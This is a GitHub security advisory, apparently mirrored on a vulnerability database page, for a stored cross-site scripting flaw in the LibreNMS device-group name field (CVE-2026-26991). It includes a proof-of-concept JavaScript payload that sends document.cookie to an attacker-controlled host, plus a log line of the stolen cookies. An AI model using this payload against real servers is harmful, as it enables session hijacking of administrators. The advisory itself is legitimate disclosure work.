GHSA-5PQF-54QP-32WX

Vulnerability from github – Published: 2026-02-18 22:07 – Updated: 2026-02-20 16:51
VLAI?
Summary
LibreNMS /device-groups name Stored Cross-Site Scripting
Details

Summary

/device-groups name Stored Cross-Site Scripting - HTTP POST - Request-URI(s): "/device-groups" - Vulnerable parameter(s): "name" - Attacker must be authenticated with "admin" privileges. - When a user adds a device group, an HTTP POST request is sent to the Request-URI "/device-groups". The name of the newly created device group is stored in the value of the name parameter. - After the device group is created, the entry is displayed along with some relevant buttons like Rediscover Devices, Edit, and Delete.

Details

The vulnerability exists as the name of the device group is not sanitized of HTML/JavaScript-related characters or strings. When the delete button is rendered, the following template is used to render the page:

resources/views/device-group/index.blade.php:

@section('title', __('Device Groups'))
@section('content')
<div class="container-fluid">
<x-panel id="manage-device-groups-panel">
// [...Truncated...]
@foreach($device_groups as $device_group)
// [...Truncated...]

<button type="button" class="btn btn-danger btn-
sm" title="{{ __('delete Device Group') }}" aria-label="{{ __('Delete') }}"
onclick="delete_dg(this, '{{$device_group->name }}', '{{ route('device-groups.destroy', $device_group->id)
}}')"> // using the device's name in the Delete button functionality without
sanitizing for XSS related characters/strings

As the device's name is not sanitized of HTML/JavaScript-related characters or strings, this can result in stored cross-site scripting.

PoC

  • Login
  • Select Devices > Manage Groups
  • Select New Device Group
  • Input 12345');var pt=new Image();pt.src='http:///cookie-
  • '.concat(document.cookie);document.body.appendChild(pt);delete_dg(this, '12345 into
  • the "Name" input box (change to be an the IP of an attacker controlled webserver)
  • Select "access_points.accesspoint_id" as the Conditional input
  • Input 1 into the Conditional value input box
  • Select Save
  • Select the Delete Icon for the newly created Device Group
  • Select OK
  • The JavaScript payload is not sanitized and an HTTP request will be sent to the attacker controlled
  • server, leaking the user's cookies.

Impact

Attacker Controlled server's logs:

192.168.1.96 - - [10/Feb/2026:13:32:25 -0600] "GET /cookie-
jqCookieJar_options=%7B%7D;%20SWIFT_cookieconsent=dismiss;%20CookieAuth=%5B%22emai

l%40email.c.com%22%2C%22%242y%2410%24zI.%5C%2F5BHghPssddSOjH6.Eek%5C%2F0hQNm8DewYh

LnQxXHlpw3abw4C74y%22%5D;%20XSRF-
TOKEN=eyJpdiI6InkrSlpHNFZ3TjRXbXl5clQ2ZVBHOFE9PSIsInZhbHVlIjoiZTROUHRCcGhYRGU4dVJL

Z2RUUTZ5VXlGZElMNjZoT0E2cGRNZzVDRmtVWTg5YTBGNzdpTU83YU1EZ3E3Tk1BTm5tNjYxTExUV1Z0Mj
BLNUlqOVl4MlpGL21xdHh3MUJwYm1zT1RaQXJwR0w5YmVXTkdKQWNXUkNvL1J2SzVtcWMiLCJtYWMiOiI0
ZTc4YjVmMjhiYjc3YTA2MDI5NjJkOTgzMTJlYmVkNGVhOTg0ZjE4ZjRlMzY1NmFlMjNiNmUyNzhlN2QwOG
I4IiwidGFnIjoiIn0%3D HTTP/1.1" 404 492 "http://192.168.1.121/" "Mozilla/5.0
(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/144.0.0.0 Safari/537.36"
Severity ?
5.1 (Medium)
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "librenms/librenms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "26.2.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-26991"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-18T22:07:19Z",
    "nvd_published_at": "2026-02-20T03:15:59Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n**/device-groups name Stored Cross-Site Scripting**\n- HTTP POST\n- Request-URI(s): \"/device-groups\"\n- Vulnerable parameter(s): \"name\"\n- Attacker must be authenticated with \"admin\" privileges.\n- When a user adds a device group, an HTTP POST request is sent to the Request-URI \"/device-groups\". The name of the newly created device group is stored in the value of the name parameter.\n- After the device group is created, the entry is displayed along with some relevant buttons like Rediscover Devices, Edit, and Delete.\n\n### Details\nThe vulnerability exists as the name of the device group is not sanitized of HTML/JavaScript-related characters\nor strings. When the delete button is rendered, the following template is used to render the page:\n\n_resources/views/device-group/index.blade.php:_\n```\n@section(\u0027title\u0027, __(\u0027Device Groups\u0027))\n@section(\u0027content\u0027)\n\u003cdiv class=\"container-fluid\"\u003e\n\u003cx-panel id=\"manage-device-groups-panel\"\u003e\n// [...Truncated...]\n@foreach($device_groups as $device_group)\n// [...Truncated...]\n\n\u003cbutton type=\"button\" class=\"btn btn-danger btn-\nsm\" title=\"{{ __(\u0027delete Device Group\u0027) }}\" aria-label=\"{{ __(\u0027Delete\u0027) }}\"\nonclick=\"delete_dg(this, \u0027{{$device_group-\u003ename }}\u0027, \u0027{{ route(\u0027device-groups.destroy\u0027, $device_group-\u003eid)\n}}\u0027)\"\u003e // using the device\u0027s name in the Delete button functionality without\nsanitizing for XSS related characters/strings\n```\n\nAs the device\u0027s name is not sanitized of HTML/JavaScript-related characters or strings, this can result in stored\ncross-site scripting.\n\n### PoC\n- Login\n- Select Devices \u003e Manage Groups\n- Select New Device Group\n- Input 12345\u0027);var pt=new Image();pt.src=\u0027http://\u003cATTACKER_IP\u003e/cookie-\n- \u0027.concat(document.cookie);document.body.appendChild(pt);delete_dg(this, \u002712345 into\n- the \"Name\" input box (change \u003cATTACKER_IP\u003e to be an the IP of an attacker controlled webserver)\n- Select \"access_points.accesspoint_id\" as the Conditional input\n- Input 1 into the Conditional value input box\n- Select Save\n- Select the Delete Icon for the newly created Device Group\n- Select OK\n- The JavaScript payload is not sanitized and an HTTP request will be sent to the attacker controlled\n- server, leaking the user\u0027s cookies.\n\n### Impact\nAttacker Controlled server\u0027s logs:\n```\n192.168.1.96 - - [10/Feb/2026:13:32:25 -0600] \"GET /cookie-\njqCookieJar_options=%7B%7D;%20SWIFT_cookieconsent=dismiss;%20CookieAuth=%5B%22emai\n\nl%40email.c.com%22%2C%22%242y%2410%24zI.%5C%2F5BHghPssddSOjH6.Eek%5C%2F0hQNm8DewYh\n\nLnQxXHlpw3abw4C74y%22%5D;%20XSRF-\nTOKEN=eyJpdiI6InkrSlpHNFZ3TjRXbXl5clQ2ZVBHOFE9PSIsInZhbHVlIjoiZTROUHRCcGhYRGU4dVJL\n\nZ2RUUTZ5VXlGZElMNjZoT0E2cGRNZzVDRmtVWTg5YTBGNzdpTU83YU1EZ3E3Tk1BTm5tNjYxTExUV1Z0Mj\nBLNUlqOVl4MlpGL21xdHh3MUJwYm1zT1RaQXJwR0w5YmVXTkdKQWNXUkNvL1J2SzVtcWMiLCJtYWMiOiI0\nZTc4YjVmMjhiYjc3YTA2MDI5NjJkOTgzMTJlYmVkNGVhOTg0ZjE4ZjRlMzY1NmFlMjNiNmUyNzhlN2QwOG\nI4IiwidGFnIjoiIn0%3D HTTP/1.1\" 404 492 \"http://192.168.1.121/\" \"Mozilla/5.0\n(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\nChrome/144.0.0.0 Safari/537.36\"\n```",
  "id": "GHSA-5pqf-54qp-32wx",
  "modified": "2026-02-20T16:51:51Z",
  "published": "2026-02-18T22:07:19Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/librenms/librenms/security/advisories/GHSA-5pqf-54qp-32wx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26991"
    },
    {
      "type": "WEB",
      "url": "https://github.com/librenms/librenms/pull/19041"
    },
    {
      "type": "WEB",
      "url": "https://github.com/librenms/librenms/commit/64b31da444369213eb4559ec1c304ebfaa0ba12c"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/librenms/librenms"
    },
    {
      "type": "WEB",
      "url": "https://github.com/librenms/librenms/releases/tag/26.2.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "LibreNMS /device-groups name Stored Cross-Site Scripting"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.